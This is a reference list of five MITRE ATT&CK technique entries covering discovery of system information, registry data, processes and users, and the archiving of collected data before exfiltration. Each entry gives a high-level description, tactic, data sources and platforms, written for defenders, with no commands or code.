Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre